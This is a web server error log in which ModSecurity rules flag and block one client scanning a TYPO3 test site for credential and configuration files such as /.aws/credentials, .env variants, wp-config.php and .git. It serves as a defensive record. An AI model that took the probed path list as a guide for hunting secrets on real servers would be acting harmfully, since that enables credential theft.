[Wed Apr 02 07:25:14.421126 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBMQAAAAM"]
[Wed Apr 02 07:25:14.421359 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBMQAAAAM"]
[Wed Apr 02 07:25:14.421527 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBMQAAAAM"]
[Wed Apr 02 07:25:14.670046 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Apr 02 07:25:14.696735 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.yaml
[Wed Apr 02 07:25:14.766721 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Wed Apr 02 07:25:14.793586 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBOwAAAAM"]
[Wed Apr 02 07:25:14.793822 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBOwAAAAM"]
[Wed Apr 02 07:25:14.793985 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBOwAAAAM"]
[Wed Apr 02 07:25:14.820516 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBPAAAAAM"]
[Wed Apr 02 07:25:14.820755 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBPAAAAAM"]
[Wed Apr 02 07:25:14.820944 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBPAAAAAM"]
[Wed Apr 02 07:25:14.975796 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBQAAAAAM"]
[Wed Apr 02 07:25:14.976129 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBQAAAAAM"]
[Wed Apr 02 07:25:14.976294 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-zKOoXG9q9bj4Y0L9vBQAAAAAM"]
[Wed Apr 02 07:25:15.002541 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.bak
[Wed Apr 02 07:25:15.410462 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBQwAAAAM"]
[Wed Apr 02 07:25:15.410749 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBQwAAAAM"]
[Wed Apr 02 07:25:15.410951 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBQwAAAAM"]
[Wed Apr 02 07:25:15.566353 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBRwAAAAM"]
[Wed Apr 02 07:25:15.566614 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBRwAAAAM"]
[Wed Apr 02 07:25:15.566786 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBRwAAAAM"]
[Wed Apr 02 07:25:15.594787 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBSAAAAAM"]
[Wed Apr 02 07:25:15.597682 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBSAAAAAM"]
[Wed Apr 02 07:25:15.597943 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/config/.env"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBSAAAAAM"]
[Wed Apr 02 07:25:15.623907 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:15.652863 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/entries"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBSgAAAAM"]
[Wed Apr 02 07:25:15.653084 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBSgAAAAM"]
[Wed Apr 02 07:25:15.653274 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "Z-zKO4XG9q9bj4Y0L9vBSgAAAAM"]
[Wed Apr 02 07:25:15.679271 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:16.065311 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:16.091771 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:16.118209 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Wed Apr 02 07:25:16.279411 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-zKPIXG9q9bj4Y0L9vBUgAAAAM"]
[Wed Apr 02 07:25:16.279643 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-zKPIXG9q9bj4Y0L9vBUgAAAAM"]
[Wed Apr 02 07:25:16.279825 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "Z-zKPIXG9q9bj4Y0L9vBUgAAAAM"]
[Wed Apr 02 07:25:16.567435 2025] [php:error] [pid 2190215] [client 154.83.103.15:27580] script '/var/www/surf/TYPO3/public/typo3conf/localconf.php' not found or unable to stat
[Wed Apr 02 07:25:16.694508 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Wed Apr 02 07:25:16.807264 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Wed Apr 02 07:25:17.475972 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-zKPYXG9q9bj4Y0L9vBYgAAAAM"]
[Wed Apr 02 07:25:17.476216 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-zKPYXG9q9bj4Y0L9vBYgAAAAM"]
[Wed Apr 02 07:25:17.476411 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-zKPYXG9q9bj4Y0L9vBYgAAAAM"]
[Wed Apr 02 07:25:17.906317 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Wed Apr 02 07:25:17.933519 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-zKPYXG9q9bj4Y0L9vBZQAAAAM"]
[Wed Apr 02 07:25:17.933753 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-zKPYXG9q9bj4Y0L9vBZQAAAAM"]
[Wed Apr 02 07:25:17.933911 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Z-zKPYXG9q9bj4Y0L9vBZQAAAAM"]
[Wed Apr 02 07:25:18.090976 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBaQAAAAM"]
[Wed Apr 02 07:25:18.091230 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBaQAAAAM"]
[Wed Apr 02 07:25:18.091412 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z-zKPoXG9q9bj4Y0L9vBaQAAAAM"]
[Wed Apr 02 07:25:18.117614 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
